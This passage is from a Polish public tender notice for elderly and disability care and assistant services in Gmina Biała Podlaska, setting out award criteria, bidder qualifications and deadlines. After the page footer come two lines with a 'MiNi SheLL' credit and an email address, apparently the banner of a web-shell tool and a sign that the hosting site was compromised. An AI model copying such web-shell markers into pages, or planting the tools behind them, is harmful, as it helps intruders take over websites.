pkt;<br/>2)	za nie zatrudnienie osoby bezrobotnej do wykonywania danej części zamówienia – 0 pkt;<br/>Powyższej ocenie zostanie podana zaoferowana przez wykonawcę w ofercie ilość osób bezrobotnych zamieszkałych na terenie Gminy Biała Podlaska zarejestrowanych w Powiatowym Urzędzie Pracy, jakie wykonawca zobowiąże się do zatrudnienia na umowę zlecenie do realizacji przedmiotu zamówienia. W przypadku samo zatrudnienia oraz osób fizycznych ubiegających się o udzielenie zamówienia ocenie zostanie poddany status osoby starającej się o zamówienie- premiowane będzie posiadanie statusu osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa opiekuńcza świadczona na rzecz minimum 6 podopiecznych ok. 72 h/ na miesiąc tj. łączna liczba godzin do realizacji 1584 h od dnia podpisania umowy do 31.05.2023 r. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 41817,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311100-3 - Usługi opieki społecznej dla osób starszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>Dot. Części I-III zamówienia:<br/>1. Nazwa kryterium (C) cena Znaczenie kryterium (w pkt) -60<br/>C=CN/Cob x 100xW<br/>C-kryterium cena<br/>Cn-cena oferty najkorzystniejszej<br/>Cob –cena oferty badanej<br/>W-waga-60%<br/><br/>2.Kryterium Doświadczenie (D) – waga max. 35pkt. - doświadczenie (w świadczeniu usług opiekuńczych przez opiekuna), będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania /usług. Liczba godzin dotyczy osoby świadczącej usługi opiekuńcze, a nie Wykonawcy jako osoby prawnej. Zamawiający przyzna punktację osobie posiadającej doświadczenie w świadczeniu usług opiekuńczych. Łączna punktacja przyznana Wykonawcy zostanie obliczona poprzez obliczenie średniej arytmetycznej godzin doświadczenia osób skierowanych do realizacji zadania<br/> a) 40 godzin usług – 0 pkt.<br/>b) Od 41 godzin do 60 godzin usług – 10 pkt.<br/>c) Od 61 godzin do 100 godzin usług – 20 pkt.<br/> d) Od 101 godzin i więcej- 35 pkt<br/>3. Kryterium aspekt społeczny – zatrudnienie osób bezrobotnych (AS) będą liczone następująco: waga max. 5 pkt.<br/>za zaoferowanie zatrudnienia co najmniej 1. osoby bezrobotnej do wykonywania danej części zamówienia – 5 pkt;<br/>za nie zatrudnienie osoby bezrobotnej do wykonywania danej części zamówienia– 0 pkt;<br/>Powyższej ocenie zostanie podana zaoferowana przez wykonawcę w ofercie ilość osób bezrobotnych zamieszkałych na terenie Gminy Biała Podlaska, zarejestrowanych w Powiatowym Urzędzie Pracy, jakie wykonawca zobowiąże się do zatrudnienia na umowę zlecenie do realizacji przedmiotu zamówienia. W przypadku samo zatrudnienia oraz osób fizycznych ubiegających się o udzielenie zamówienia ocenie zostanie poddany status osoby starającej się o zamówienie- premiowane będzie posiadanie statusu osoby bezrobotnej<br/><br/>dot.Części IV zamówienia:<br/>1.Nazwa kryterium cena (C)	Znaczenie kryterium (w pkt) - 60<br/><br/> C=CN/Cob x 100xW<br/>C-kryterium cena<br/>Cn-cena oferty najkorzystniejszej<br/>Cob –cena oferty badanej<br/>W-waga-60<br/>2.Kryterium Doświadczenie (D) – waga max. 35pkt. - doświadczenie (w świadczeniu usług asystenckich przez asystenta), będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania /usług. Liczba godzin dotyczy osoby świadczącej usługi asystenckie, a nie Wykonawcy jako osoby prawnej. Zamawiający przyzna punktację osobie posiadającej doświadczenie w świadczeniu usług o asystenckich. Łączna punktacja przyznana Wykonawcy zostanie obliczona poprzez obliczenie średniej arytmetycznej godzin doświadczenia osób skierowanych do realizacji zadania:<br/><br/> a) 40 godzin usług – 0 pkt.<br/>b) Od 41 godzin do 60 godzin usług – 10 pkt.<br/>c) Od 61 godzin do 100 godzin usług – 20 pkt.<br/> d) Od 101 godzin i więcej-35 pkt<br/>3. Kryterium aspekt społeczny – zatrudnienie osób bezrobotnych (AS) będą liczone następująco:- waga max. 5 pkt.<br/>1)	za zaoferowanie zatrudnienia co najmniej 1. osoby bezrobotnej do wykonywania danej części zamówienia – 5 pkt;<br/>2)	za nie zatrudnienie osoby bezrobotnej do wykonywania danej części zamówienia – 0 pkt;<br/>Powyższej ocenie zostanie podana zaoferowana przez wykonawcę w ofercie ilość osób bezrobotnych zamieszkałych na terenie Gminy Biała Podlaska zarejestrowanych w Powiatowym Urzędzie Pracy, jakie wykonawca zobowiąże się do zatrudnienia na umowę zlecenie do realizacji przedmiotu zamówienia. W przypadku samo zatrudnienia oraz osób fizycznych ubiegających się o udzielenie zamówienia ocenie zostanie poddany status osoby starającej się o zamówienie- premiowane będzie posiadanie statusu osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Usługa asystencka obejmuje wspieranie osób z niepełnosprawnościami w wykonywaniu podstawowych czynności dnia codziennego, niezbędnych do aktywnego funkcjonowania społecznego (np. wsparcie w przemieszczaniu się m.in. do lekarza, do punktów usługowych i innych miejsc publicznych oraz asysta w tych miejscach, spędzanie czasu wolnego, w tym wsparcie podczas zajęć kulturalnych, sportowych i rekreacyjnych, tłumaczenie na język migowy), zawodowego (np. wsparcie w przemieszczaniu się do pracy, urzędów pracy, podmiotów aktywizujących zawodowo oraz asysta w tych miejscach i zajęciach), edukacyjnego (np. wsparcie w przemieszczaniu się do szkół i placówek oświatowych oraz na ich terenie, wsparcie podczas zajęć edukacyjnych i w procesie uczenia: gromadzenie materiałów, korzystanie z biblioteki). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 42944 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85311100-3 - Usługi opieki społecznej dla osób starszych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312100-0 - Usługi opieki dziennej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">dot.Części IV zamówienia:<br/>1.Nazwa kryterium cena (C)	Znaczenie kryterium (w pkt) - 60<br/><br/> C=CN/Cob x 100xW<br/>C-kryterium cena<br/>Cn-cena oferty najkorzystniejszej<br/>Cob –cena oferty badanej<br/>W-waga-60<br/>2.Kryterium Doświadczenie (D) – waga max. 35pkt. - doświadczenie (w świadczeniu usług asystenckich przez asystenta), będzie oceniane na podstawie wykazu osób skierowanych do realizacji zadania /usług. Liczba godzin dotyczy osoby świadczącej usługi asystenckie, a nie Wykonawcy jako osoby prawnej. Zamawiający przyzna punktację osobie posiadającej doświadczenie w świadczeniu usług o asystenckich. Łączna punktacja przyznana Wykonawcy zostanie obliczona poprzez obliczenie średniej arytmetycznej godzin doświadczenia osób skierowanych do realizacji zadania:<br/><br/> a) 40 godzin usług – 0 pkt.<br/>b) Od 41 godzin do 60 godzin usług – 10 pkt.<br/>c) Od 61 godzin do 100 godzin usług – 20 pkt.<br/> d) Od 101 godzin i więcej-35 pkt<br/>3. Kryterium aspekt społeczny – zatrudnienie osób bezrobotnych (AS) będą liczone następująco:- waga max. 5 pkt.<br/>1)	za zaoferowanie zatrudnienia co najmniej 1. osoby bezrobotnej do wykonywania danej części zamówienia – 5 pkt;<br/>2)	za nie zatrudnienie osoby bezrobotnej do wykonywania danej części zamówienia – 0 pkt;<br/>Powyższej ocenie zostanie podana zaoferowana przez wykonawcę w ofercie ilość osób bezrobotnych zamieszkałych na terenie Gminy Biała Podlaska zarejestrowanych w Powiatowym Urzędzie Pracy, jakie wykonawca zobowiąże się do zatrudnienia na umowę zlecenie do realizacji przedmiotu zamówienia. W przypadku samo zatrudnienia oraz osób fizycznych ubiegających się o udzielenie zamówienia ocenie zostanie poddany status osoby starającej się o zamówienie- premiowane będzie posiadanie statusu osoby bezrobotnej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie osób bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące: postępowaniu:<br/><br/>-zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>-uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>-uprawnień sytuacji ekonomicznej lub finansowej;<br/>Zamawiający nie określa warunku w ww. zakresie<br/> -zdolności technicznej lub zawodowej w zakresie:<br/><br/>-Część I-III zamówienia: Zamawiający żąda przedstawienia wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;- zał. Nr 4<br/> Zamawiający uzna za warunek spełniony, jeżeli Wykonawca będzie dysponował przynajmniej 1 osobą na realizację każdej z części zamówienia, która będzie posiadać potrzebne kwalifikacje, uprawnienia, doświadczenie niezbędne do wykonania zamówienia tj.: Usługa opiekuńcza może być świadczona przez:<br/><br/>a) osobę, która posiada kwalifikacje do wykonywania jednego z zawodów: opiekun środowiskowy, asystent osoby niepełnosprawnej, pielęgniarz, opiekun osoby starszej, opiekun medyczny, opiekun kwalifikowany w domu pomocy społecznej a także ukończyła szkolenie w zakresie udzielania pierwszej pomocy lub pomocy przedmedycznej<br/>b) osobę, która posiada doświadczenie w realizacji usług opiekuńczych, w tym zawodowe, wolontariackie lub osobiste wynikające z pełnienia roli opiekuna faktycznego i odbyła minimum 80-godzinne szkolenie z zakresu realizowanej usługi <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu: dotyczy części I-IV zamówienia<br/>- wykazu osób skierowanych do realizacji usług zgodnie z zał. Nr 4 do SWZ opisanym w rozdz. VI ust. 6.1.4 tiret jeden i/lub drugi</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy <br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>b)	w przypadku, o którym mowa w rozdziale 6.3 SWZ wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. Oświadczenie należy złożyć wg wymogów załącznika nr 13 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>c)	zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt. 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>	w pkt. 8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku<br/>	w pkt. 8.3.2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 21.3	Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art.455 ustawy Pzp oraz postanowień Projektu Umowy- zał. nr 6 i/lub 7 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-06 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej. Składanie ofert następuje za pośrednictwem platformy zakupowej dostępnej pod adresem internetowym: https://gmina-bialapodlaska.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-06 11:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-04</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-29 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com